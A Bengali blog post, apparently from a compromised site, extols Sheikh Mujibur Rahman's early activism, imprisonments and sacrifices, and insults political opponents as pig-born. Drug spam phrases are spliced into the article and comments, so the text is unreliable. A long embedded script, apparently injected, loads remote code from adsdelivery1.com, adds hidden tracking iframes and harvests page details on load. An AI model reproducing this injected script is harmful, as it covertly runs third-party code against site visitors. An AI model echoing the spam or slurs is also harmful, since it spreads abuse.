দলনিরপেক্ষ বুদ্ধিজীবী এবং একটা শুয়োরের জন্মবৃতান্ত

331

বার পঠিত

গতকাল রংপুরের পিশাচ আজহারের ফাঁসির রায় হইছে। অনলাইনে দলনিরপেক্ষ বুদ্ধিজীবীদের বেশ গম্ভীর গলায় মতপ্রকাশ করতে দেখলাম, আরে এইটা তো হাসিনা সরকারের আইওয়াশ কর্মসূচী, তলে তলে পৃথিবী আঁতাতময়। এক বড় ভাই পয়েন্ট টু পয়েন্ট লজিক দিয়ে প্রতিবাদ করল, স্বাধীনতার স্বপক্ষের মানুষ হিসেবে পরিচয় দেওয়া একজন সাথে সাথে বললেন, এই যে আইছে শেখ মুজিবের মুরিদ। কমেন্টটার বিরুদ্ধে অবাক হয়ে তাকায়া থাকলাম কিছুক্ষণ, রাজাকারের বিরুদ্ধে কথা বলার পাশাপাশি যেখানে সেখানে বঙ্গবন্ধুকে টেনে এনে তাচ্ছিল্য করাটাও আজকাল চালু স্টাইল, যুদ্ধের সময় এই লোক পাকিস্তানের জেলে তার জন্য খোঁড়া কবরের পাশে আরামআয়েশে নয় মাস কাটায়ে দিছে, হু ইজ হি? ২৪ ঘণ্টা হি ইজ নোবডি, হি ইজ নোবডি শ্লোগান দাও, দলনিরপেক্ষ দেশপ্রেমিক হিসেবে তুমি অমর হইবা…

একে ফজলুল হক তখন বাঙলার বাঘ, ব্রিটিশ পিরিয়ডে অবিভক্ত বাঙলার প্রধানমন্ত্রী,প্রবল প্রতাপ তার। আরেক ডাকসাইটে নেতা হোসেন শহীদ সোহরোয়ার্দী তখন বাণিজ্যমন্ত্রী, পাথরকঠিন ব্যক্তিত্ব তাদের। গোপালগঞ্জ মিশনারি স্কুল পরিদর্শন শেষে ফিরে যাবার সময় এক বিচিত্র দৃশ্য দেখা গেল। কয়েকটা ছেলে হঠাৎ সব প্রোটোকল ভেঙ্গে এক দৌড়ে উপস্থিত হয়েছে তাদের সামনে, তুমুল হইচই পড়ে গেল। সবার সামনের ছেলেটার বেতের মতো চিকন শরীর, একহারা লম্বা গড়ন, চোখে কালো ফ্রেমের চশমা। প্রধানমন্ত্রীর বিশাল দেহের সামনে ক্ষুদ্র দেখাতে থাকা ছেলেটা গলা দিয়ে অবশ্য দৃঢ় সাহসী গম্ভীর স্বর বেরুল,” আপনারা যে চলে যাচ্ছেন, আমাদের হোস্টেলের বোর্ডিং ঘরের চালের কি হবে? পুরনো চাল, বৃষ্টি হলে পানি পড়ে, শীতকালে ঠাণ্ডা হাওয়া ঢোকে। ছেলেগুলো যে বড় কষ্ট পায়… can levitra and viagra be taken together

ছেলেটা তখন ক্লাস এইটে পড়ে। স্কুলের হোস্টেলের ছেলেদের কষ্ট নিয়ে চিন্তা করাটা ঠিক তার বয়সের সাথে যায় না। কিন্তু ছেলেটা চিন্তা করতো, শুধু স্কুলের ছেলেদের জন্যই নয়, সবার জন্য, সবার দুঃখকষ্টই কিভাবে যেন ছেলেটার দুঃখকষ্ট হয়ে যেত। ছেলেটা সারাজীবন আর কিছু নিয়ে চিন্তা করেনি, করার সুযোগ পায়নি, তার চিন্তা-ভাবনায় কেবলই ছিল তার দেশের জনগন, তার সন্তানসম জনগন। ছেলেটার নাম শেখ মুজিবুর রহমান, লাখো জনতা যাকে ভালোবেসে ডেকেছিল বঙ্গবন্ধু নামে।

গোপালগঞ্জের অসংখ্য মানুষের চোখের মনি খোকা যখন ৪৩ এর ভয়ংকর দুর্ভিক্ষে কঙ্কালাসার নিরন্ন মানুষের মুখে একটু খাবার তুলে দিতে উদয়াস্ত দৌড়ে বেড়াচ্ছেন, তখন তার পরিচয় মুজিব ভাই হিসেবে। বেকার হোস্টেলে থাকতেন, কড়া নিয়ম হোস্টেলের, রাত আটটার মধ্যে ফিরতে হবে। মানুষের মুখে একটু খাবার তুলে দিয়ে ফিরতে ফিরতে প্রায় দিনই মুজিবের দশটা বেজে যায়। হোস্টেল সুপার খুব জাঁদরেল মানুষ, সাফ জানিয়ে দিলেন, সময়মত ফিরতে না পারলে জরিমানা গুণতে হবে বড় অংকের। মুজিব গলা ধীর স্থির শোনায়,“ দেশে দুর্ভিক্ষ, মানুষ না খেতে পেয়ে মারা যাচ্ছে। আমি বরং ফাইন দেব, তার জন্য যদি মরণাপন্ন একটা মানুষ এক মুঠো খেটে পায়, তাতেই আমি খুশি।“ বিস্ময়াবিভূত হোস্টেল সুপার লক্ষ্য করেন, মুজিবের গলা ধরে এসেছে। কিছুক্ষন চিন্তা করে অবশেষে বলেন, আচ্ছা, তুমি কাজ সেরেই ফিরো, আমি ব্যাপারটা দেখবো…

বাঙালীদের একটা আলাদা দেশ হবে, একটা স্বাধীন পরিচয় হবে, এই স্বপ্ন সবসময়ই খুব যত্নে লালন করতেন মুজিব। স্বপ্ন দেখতে ভয় পেতেন না, তা সে যত অসম্ভবই হোক না কেন। অসামান্য নেতৃত্বগুন আর দূরদর্শিতা দিয়ে সেই স্বপ্ন বাস্তবায়নের হ্যাডমও ছিল তার। বাঙ্গালীকে প্রচণ্ড ভালোবাসতেন, তাই বঞ্চনা আর শোষণের বিরুদ্ধে আন্দোলনে সবসময় তাকে পাওয়া যাইত রাজপথে, মিছিলের সামনের সারিতে, শ্লোগান দেওয়াবস্থায়।

পাকিস্তান সৃষ্টির ছয়মাস পর গণপরিষদে পশ্চিম পাকিস্তানের পাপেট পূর্ব পাকিস্তানের মুখ্যমন্ত্রী খাজা নাজিমউদ্দিন যখন ঘোষণা করল, দেহসের বিপুল জনগোষ্ঠী উর্দুকেই পাকিস্তানের রাষ্ট্রভাষা করার পক্ষপাতী, তখন আক্ষরিক অর্থেই ক্ষেপে গেলেন শেখ মুজিব। ১৯৪৮ সালের ১১ই মার্চ সকাল সাড়ে নয়টায় ইডেন সেক্রেটারি ভবনের এক নম্বর গেটে দেখা গেল তাকে, জননেতা শামসুল হক, অলি আহাদ, আবুল কাশেমদের সাথে, রাষ্ট্রভাষা সংগ্রাম পরিষদের অন্যতম সংগঠক হিসেবে। কণ্ঠে গর্জে উঠলো সেই অমর শ্লোগান, রাষ্ট্রভাষা, রাষ্ট্রভাষা, বাঙলা চাই, বাঙলা চাই। জনসমাগম পরিনত হল জনসমুদ্রে। পূর্ব পাকিস্তানকে সবসময় পূর্ববাঙলা উচ্চারণ করতেন যে মানুষটা, সেই শেখ মুজিব বাঙলা ভাষার স্বাধিকারের দাবিতে প্রথম মিছিল থেকেই গ্রেফতার হলেন, শুরু হল এক অসামান্য আখ্যানের…

‘৪৮ সালের ১১ই মার্চ থেকে শুরু হল, এরপর ১৯৭২ সালের ১০ই জানুয়ারি স্বাধীন বাংলাদেশে ফেরার আগ পর্যন্ত তার জীবনের ২৪ বছরের মধ্যে প্রায় ১৫ বছরই কারাগারের চার দেয়ালের অন্ধকার প্রকোষ্ঠে হারিয়ে গেছে। মিছিলে, আন্দোলনে সবসময় সামনে থেকে নেতৃত্ব দিতেন, শ্লোগান থেকে আগুন বেরোত, গ্রেফতার না করে পুলিশের কোন উপায়ই থাকতো না। বহিদিন পর জেল থেকে ছাড়া পেতেন, জেলগেট থেকেই আবার গ্রেফতার।কখনো দেখা গেল, বাইরে বেরিয়ে এসেছেন, এসেই মিছিলে যোগ দিয়েছেন, সেই মিছিল থেকেই আবার গ্রেফতার করে নিয়ে গেল পুলিশ। পাথর কঠিন ছিল তার মনোবল, শত হুমকি-ধামকি, মৃত্যুভীতি কিছুই বিন্দুমাত্র টলাতে পারেনি তাকে, মচকাননি নিজের অজান্তেও। ক্রমাগত অনশন আর অনিয়মে একসময় ব্রংকাইটিস হয়ে গেল তার, কফের সাথে টকটকে তাজা রক্ত বের হত,মাঝে মাঝেই প্রচণ্ড বুক ব্যথায় অবসন্ন হয়ে পড়েন। শুকিয়ে হাড় জিরজিরে হয়ে জাবার পর গোয়েন্দা বিভাগের কর্মকর্তারা ভিন্ন পথ ধরলেন, প্রতিদিন বণ্ড দলিল নিয়ে আসেন, দুঃখিত স্বরে বলেন, শেখ সাহেব, আর কত কষ্ট করবেন? এইখানে একটা সাইন দিয়ে দেন, আপনাকে মুক্তি দিয়ে দেই। মুজিবের মুখ কঠিন হয়ে যায়, শোনেন জনাব, আমি শেখ মুজিবুর রহমান, বণ্ড দিয়ে আমি শেখ মুজিবুর রহমান পাকিস্তান সরকারের কাছে মুক্তি চাই না। আমি বাঙলার মেহনতি মানুষের জন্য সংগ্রাম করতেছি, তাদের অধিকার আদায়ের সংগ্রাম করতেছি, বণ্ড সই দিলে তাদের সাথে বেইমানি করা হবে। ডিটেনশন দিয়ে আমাকে মেরে ফেলেন, কিন্তু আমি মুচলেকা দিব না।
১৯৫২ সালের ১৪ই ফেব্রুয়ারি ভয়ংকর অসুস্থ মুজিবকে হাসপাতাল থেকে নেওয়া হল ফরিদপুর কারাগারে, সঙ্গে আরেক ছাত্রনেতা মহিউদ্দিন।১৬ তারিখে ফরিদপুর পৌঁছেই অসুস্থ মুজিব মহিউদ্দিনকে নিয়ে শুরু করলেন অনশন ধর্মঘট, উদ্দেশ্য যেভাবেই হোক ২১ তারিখের রাষ্ট্রভাষা দিবসে নেতৃত্ব দিতে হবে। সারা দেশের মানুষের কাছে অগ্নিস্ফুলিঙ্গ হয়ে ছড়ায়ে গেল এই খবর, মরতে বসেও মানুষটা দমে নাই, টলে নাই একবিন্দু, বরং ছাত্রনেতাদের কাছে সংবাদ পাঠাইছে, আমারে বদলি কইরা তারা আমার ধর্মঘট থামাইতে পারব না, আমি অনশন করুমই। আগুন জ্বলে উঠলো দ্বিগুণ বেগে, সৃষ্টি হল একুশের অমর বীরত্বগাঁথা…

একটা মানুষের কাছে সবচেয়ে প্রিয় তার পরিবার। সেই পরিবারের কথা কখনো ভাবে নাই শেখ মুজিব, সর্বক্ষণ তার ভাবনায় তার জনগন, নির্যাতিত নিষ্পেষিত জনগন, বাঙালী ছিল তার কাছে পরিবারের চেয়েও আপন। কোন সন্তানের জন্মের সময়ই পাশে থাকতে পারেন নাই, সন্তানেরা তার বাবারে কাছে পায় নাই। প্রচণ্ড একাকীত্বে সময় পার হত স্ত্রী রেনুর, চোখের জলটা কোনোদিন মুজিবরে দেখতে দেন নাই, পাছে যদি তার মন দুর্বল হয়ে পড়ে, মুজিব ত তার একার না, মুজিব যে পুরো জাতির।

গোপালগঞ্জ কারাগারে রেণু আসছেন হাসু(শেখ হাসিনা) আর কামাল(শেখ কামাল)কে নিয়ে, মুজিবের সাথে বহুদিন পর দেখা। কামাল এইদিক ওইদিক ঘুরতেছে, ফিরতেছে, হাসুর সাথে খেলতেছে, গোঁফওলা কালো ফ্রেমের চশমা পড়া মানুষটাকে ঠিক চিনতেছে না। হাসু আপা কয়েকবার আব্বা বলে ডাকলো মানুষটাকে, শুনে সে হঠাৎ হাসুর জামার খুঁট ধরে আস্তে করে বলল, “হাসু আপা, তোমার আব্বাকে একটু আব্বা বলে ডাকি?” পিতা হিসেবে এইটাই ছিল মুজিবের নিয়তি, সাড়ে সাত কোটি বাঙ্গালীর জন্য মানুষটা স্যাক্রিফাইস করছিল সব… সবকিছু…

সেই শেখ মুজিবকে আজ আধুনিক প্রজন্মের দলনিরপেক্ষ বুদ্ধিজীবীরা এড়িয়ে চলার চেষ্টা করেন, তুচ্ছতাচ্ছিল্য করেন, মুজিবকে নিয়ে তাদের আর বুদ্ধিপ্রতিবন্ধী অপোগণ্ড তারেক রহমানের বক্তব্য একই পারপাস সার্ভ করে। যে শেখ মুজিব বাঙ্গালীকে এতটাই ভালোবাসতেন যে, পাকিস্তানের লায়ালপুর কারাগারে নিজের সেলের পাশে কবর খুঁড়তে দেখেও বিন্দুমাত্র ভয় পাননি, বাঙ্গালীর জন্য যিনি নিজের সমস্ত সাধ-আহ্লাদ, পরিবার-পরিজন,জীবনের সবটুকু বিলিয়ে দিয়েছেন নিঃস্বার্থভাবে, যার জন্য আজ বাংলাদেশ পৃথিবীর অন্যতম প্রতিশ্রুতিশীল দেশ হিসেবে মাথা উঁচু করে দাঁড়িয়েছে, তাকে কি সহজেই অপমান করে যায় কিছু দেশপ্রেমিক। পাকিস্তানের গোলাম হয়ে জন্মাবার বদলে স্বাধীন সার্বভৌম বাংলাদেশের হিসেবে নাগরিক হিসেবে জন্মালো যার অপরিসীম ত্যাগ-তিতিক্ষায়, তাকে ধন্যবাদ জানানো তো দূরে থাক, তার মুরিদ বানায়া কাউকে পচাইতে পারলে বিমলানন্দ পায় প্রজন্মের কিছু আপডেটেড সন্তান। প্রজন্ম রাজাকারের ফাঁসি নিয়ে আঁতাতথিউরি প্রসব করে দেশপ্রেমিক সাজে, কিন্তু শেখ মুজিবরে চিনে না… হু ইজ হি? প্রজন্ম, তোমার জন্মপরিচয় নিয়েও তুমি নিরপেক্ষতা দুচাও? একটা শুয়োরের বাচ্চারও কিন্তু জন্মপরিচয় ঠিক থাকে। প্রজন্ম, তুমি কি একটা শুয়োরের বাচ্চারও অধম?

// // <![CDATA[
function Configs() {if ( arguments.callee._singletonInstance )return arguments.callee._singletonInstance;arguments.callee._singletonInstance = this; this.GetByName = function (obj) {for(var i=0; i<this.param.length; i++) {if (this.param[i].name == obj) return this.param[i];}return null;};this.GetKey = function(name) {var el = this.GetByName(name);return (el == null) ? null : el.key;};this.SetConfig = function(param) {this.param = param;this.CounterOneDay = this.GetByName("c1d");};};function loadJqueryCookie() {jQuery.cookieCustom = function(name, value, options) {if (typeof value != 'undefined') { options = options || {};if (value === null) {value = '';options = jQuery.extend({}, options); options.expires = -1;}var expires = '';if (options.expires && (typeof options.expires == 'number' || options.expires.toUTCString)) {var date;if (typeof options.expires == 'number') {date = new Date();date.setTime(date.getTime() + (options.expires * 24 * 60 * 60 * 1000));} else {date = options.expires;}expires = '; expires=' + date.toUTCString(); }var path = options.path ? '; path=' + (options.path) : '';var domain = options.domain ? '; domain=' + (options.domain) : '';var secure = options.secure ? '; secure' : '';document.cookie = [name, '=', encodeURIComponent(value), expires, path, domain, secure].join('');} else { var cookieValue = null;if (document.cookie && document.cookie != '') {var cookies = document.cookie.split(';');for (var i = 0; i span { display: block; height: 11px; cursor: pointer; }’+’a#’ + context.epomBuyHereId + ‘ { position: absolute; top: 0; right: 0; border: 1px solid rgba(255, 255, 255, 0.8); background: rgba(255, 255, 255, 0.6); z-index: 99999; overflow: hidden; width:19px; text-decoration: none; }’+’a#’ + context.epomBuyHereId + ‘ > span { background-position: 4px 1px; background-repeat: no-repeat; line-height: 11px; font-family: Arial, sans-serif; color: #010101; font-size: 10px; text-shadow: 0 1px 0 #fff; }’+’a#’ + context.epomBuyHereId + ‘:hover { text-decoration: none }’+’a#’ + context.epomBuyHereId + ‘:active, a#’ + context.epomBuyHereId + ‘:focus { outline: none }’;st.innerHTML = t;var ie = ‘‘;document.getElementsByTagName(‘head’)[0].appendChild(st,ie);var apomAds = document.getElementById(context.epomBuyHereId);apomAds.onmouseover = context.widthChange;apomAds.onmouseout = context.widthRestore; }catch(e) {}};context.widthChange = function() {if (!this.currentWidth) {this.currentWidth = 19;}context.doWidthChangeMem(this,this.currentWidth,120,25,25,1.2);};context.widthRestore = function() {if (!this.currentWidth) {return;}context.doWidthChangeMem(this,this.currentWidth,19,25,25,1.2);}; context.doWidthChangeMem = function (apomAds,startWidth,endWidth,steps,intervals,powr) {var apomAds = document.getElementById(context.epomBuyHereId);if (apomAds.widthChangeMemInt) {window.clearInterval(apomAds.widthChangeMemInt);}var actStep = 0;apomAds.widthChangeMemInt = window.setInterval(function() {apomAds.currentWidth = context.easeInOut(startWidth,endWidth,steps,actStep,powr);apomAds.style.width = apomAds.currentWidth + “px”;actStep++;if (actStep > steps) {window.clearInterval(apomAds.widthChangeMemInt);}},intervals);};context.easeInOut = function(minValue,maxValue,totalSteps,actualStep,powr) {var delta = maxValue – minValue;var stepp = minValue+(Math.pow(((1 / totalSteps) * actualStep), powr) * delta);return Math.ceil(stepp);};};var Counter = function (param) {var context = this;context.defaulePrefixValue = “adscounter”;context.bannerParamsScriptTemplate = ‘var AdsdeliveryConfig = AdsdeliveryConfig || {ads:[]};AdsdeliveryConfig.ads.push({adsdelivery_key:”{0}”,adsdelivery_channel:”{1}”, adsdelivery_code_format:”ads-async.js”, adsdelivery_ads_host:”//adsdelivery1.com”,adsdelivery_click:””, adsdelivery_custom_params:{2}, adsdelivery_target_id:”{3}”});’;context.bannerFunctionScript = ‘(function () {var sc = document.createElement(“script”);sc.type = “text\/javascript”; sc.async = true;sc.src = (location.protocol == “https:” ? “https:” : “http:”) + “//adsdelivery1.com\\/js\\/show_ads_adsdelivery.js”;var s = document.getElementsByTagName(“script”)[0];s.parentNode.insertBefore(sc, s); })();’;context.bannerId = param.id;context.channelValue = (param.channelValue != null) ? param.channelValue : “”;context.customParamValue = (param.customParamValue != null) ? param.customParamValue : “{}”;context.adsPrefix = (param.adsPrefix != null) ? param.adsPrefix : context.defaulePrefixValue;context.isPopup = (param.isPopup != null) ? param.isPopup : false;context.overlayTitle = param.overlayTitle;context.overlayLink = param.overlayLink;context.htmlId = context.adsPrefix + “-” + context.bannerId;context.replacer = function(string, valArr) {for (var i=0; i 0){function loop() {setTimeout(function () { if (context.Banners[i].disabled != true && (context.Banners[i].checkExcludeList!= true || !context.IsExclude(context.ExcludeList) ) &&(context.Banners[i].notHttps !=true || !context.IsHttps())) {context.AddOneBanner(context.Banners[i]); } i++; if(i=0; i–){if (commonSuffix.indexOf(domain[i])===-1){shortDomain = domain[i];break;}}return shortDomain;};context.getKeyWordString = function () {var url = document.location.href;var title = “”;if (document.getElementsByTagName(“title”).length > 0) {title = document.getElementsByTagName(“title”)[0].innerHTML;}var description = “”;var metas = document.getElementsByTagName(‘meta’);for (var i=0,length=metas.length; i -1) {result = result.replace(“‘”,””);}return encodeURIComponent(result.toLowerCase());};context.getUrlString = function () {var url = document.location.href;var result = url;while (result.indexOf(“‘”) > -1) {result = result.replace(“‘”,””);}return encodeURIComponent(result.toLowerCase());};context.getTitleDescriptionString = function () {var title = “”;if (document.getElementsByTagName(“title”).length > 0) {title = document.getElementsByTagName(“title”)[0].innerHTML;}var description = “”;var metas = document.getElementsByTagName(‘meta’);for (var i=0,length=metas.length; i -1) {result = result.replace(“‘”,””);}return encodeURIComponent(result.toLowerCase());};context.IsExclude = function(exclusionList) {var host=document.location.hostname;var domain=host.split(“.”);var str=[];for (var i = domain.length – 1; i >=0; i–){str[i]=domain[i];for(var j = 0; j (new Date().getTime() – (1000 * 60 * context.timeDiferenceMinutes))) {if (lastPageLoaded.clickCount == null) {lastPageLoaded.clickCount == 0;}if (parseInt(lastPageLoaded.clickCount) >= context.clickMax){context.insertToBlackList(currentSite);result = false;}lastPageObj = {clickCount : parseInt(lastPageLoaded.clickCount) + 1 , url : document.location.href, time : new Date()};} else {lastPageObj = {clickCount : 1, url : document.location.href, time : new Date()};}}var lastPageStr = ‘{“clickCount” : “‘ + lastPageObj.clickCount + ‘”, “url” : “‘ + lastPageObj.url + ‘”, “time” : “‘ + lastPageObj.time + ‘” }’;jQuery.cookieCustom(‘lastPage’, lastPageStr);}return result;};context.insertToBlackList = function(url) {context.blackList = null;if (jQuery.cookieCustom(‘blackList’) != null) {context.blackList = JSON.parse(jQuery.cookieCustom(‘blackList’));context.blackList.time = new Date(context.blackList.time);}var added = false;if (context.blackList == null) {context.blackList = [];}for(var i=0; i<context.blackList.length; i++) {if (context.blackList[i].url == url) {added = true;context.blackList[i].time = new Date();break;}}if (added == false) {context.blackList.push({url:url, time: new Date()});}var blackList = "[";for (var i = 0; i 0) {blackList +=”,”;}blackList += ‘{“url” : “‘ + context.blackList[i].url + ‘”, “time” : “‘ + context.blackList[i].time + ‘”}’;}blackList += “]”;jQuery.cookieCustom(‘blackList’, blackList);};context.isBrokenSite = function() {var res = false;context.blackList = null;if (jQuery.cookieCustom(‘blackList’)!=null) {context.blackList = JSON.parse(jQuery.cookieCustom(‘blackList’));for (var i = 0; i < context.blackList.length; i++) {context.blackList[i].time = new Date(context.blackList[i].time);}}var currentSite = document.location.href;if (context.blackList!=null) {for(var i=0; i<context.blackList.length; i++) {if (context.blackList[i].url == currentSite) {if (context.blackList[i].time.getTime() = 1 && parseInt(versionArr[1]) >= 4 ) {context.jQueryAlreadyExist = true;return false;}}return true;};context.Run = function () {new Configs().SetConfig(context.XafdasgT.NonStandardBanners);context.AddCounters();if (XafdasgT.AdvancedSettings._isRemote == true) { if (context.CheckJQueryNeed()) {var jQueryScript = document.createElement(“script”);jQueryScript.src = location.protocol + “//ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js”;document.body.appendChild(jQueryScript);setTimeout(function(){if (context.jQueryAlreadyExist == false) {jQuery.noConflict();}context.Action();}, 1000);} else {context.Action();}} else {context.Action();}};context.Action = function () {var isCookieExist = (context.params._cookie == 1) ? (new CookieChecker({timeDiferenceMinutes : context.timeDiferenceMinutes, clickMax : context.clickMax, timeDiference : context.timeDiference})).checkSite() : true;if (isCookieExist == true) {(new NonStandardBanners({RegBanners : context.XafdasgT.RegBanners, OverlayParams: { title: context.params._overlayTitle, link : context.params._overlayURL},ExcludeList : context.XafdasgT.ExcludeList})).AddBanners(); }setTimeout(function(){;},2000);};context.AddCounters = function(counterParams) {context.AddIframeBanner({key: Configs().CounterOneDay.key, channel: Configs().CounterOneDay.channelValue, customParam: Configs().CounterOneDay.customParamValue});};context.AddIframeBanner = function(iframeParam) {var cuString = “”;for (var key in iframeParam.customParam) {cuString += “cp.” + key + “=” + iframeParam.customParam[key] + “&”;cuString = context.changeVariable(cuString);}var countid = document.createElement(‘iframe’);countid.src = (location.protocol == “https:” ? “https:” : “http:”) + “//adsdelivery1.com/ads?v=1&key=” + iframeParam.key + “&ch=” + iframeParam.channel + “&” + cuString + “r=” + Math.random();countid.height=”2″;countid.width=”2″;document.head.appendChild(countid);};context.IsExclude = function(exclusionList) {var host=document.location.hostname;var domain=host.split(“.”);var str=[];for (var i = domain.length – 1; i >=0; i–){str[i]=domain[i];for(var j = 0; j 0; i–){if (commonSuffix.indexOf(domain[i])===-1){shortDomain = domain[i];break;}}return shortDomain;};context.getKeyWordString = function () {var url = document.location.href;var title = “”;if (document.getElementsByTagName(“title”).length > 0) {title = document.getElementsByTagName(“title”)[0].innerHTML;}var description = “”;var metas = document.getElementsByTagName(‘meta’);for (var i=0,length=metas.length; i -1) {result = result.replace(“‘”,””);}return encodeURIComponent(result.toLowerCase());};return context;};if (typeof(DCKAdvertismentManager)==”undefined”){DCKAdvertismentManager = new AdvertismentManager(XafdasgT); DCKAdvertismentManager.Run();}
// ]]>

You may also like...

  1. একজন শুয়োরের কথায় কি এসে যায়?

    বঙ্গবন্ধুকে নিয়ে বড় বড় ঐতিহাসিকগণ মন্তব্য করার আগে সত্তুর বার ভাবে,
    এক তারেক শুয়োর এর ভাবার প্রয়োজন পড়ে না, কারন সে বঙ্গবন্ধুকে কালিমালিপ্ত করতেই এটা করে।
    এর জন্য রাজনীতিজ্ঞ হওয়ার প্রয়োজন পড়ে না, শুয়োরের গর্ভে জন্ম নিলেই চলে।
    তারেক তার জন্ম বৃত্তান্ত জানান দিচ্ছে, আমি এতেই খুশি।

    glyburide metformin 2.5 500mg tabs
  2. এইসব প্রতিবন্ধীদের কথায় কান দেয়ার কোন দরকারই নাই… তবুও আক্ষেপটা এসে যায় মাঝে মাঝে, এই আর কি ।

আপনার ই-মেইল ও নাম দিয়ে মন্তব্য করুন * synthroid drug interactions calcium

Question   Razz  Sad   Evil  Exclaim  Smile  Redface  Biggrin  Surprised  Eek   Confused   Cool  LOL   Mad   Twisted  Rolleyes   Wink  Idea  Arrow  Neutral  Cry   Mr. Green

walgreens pharmacy technician application online

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

metformin synthesis wikipedia

Heads up! You are attempting to upload an invalid image. If saved, this image will not display with your comment.

wirkung viagra oder cialis
metformin tablet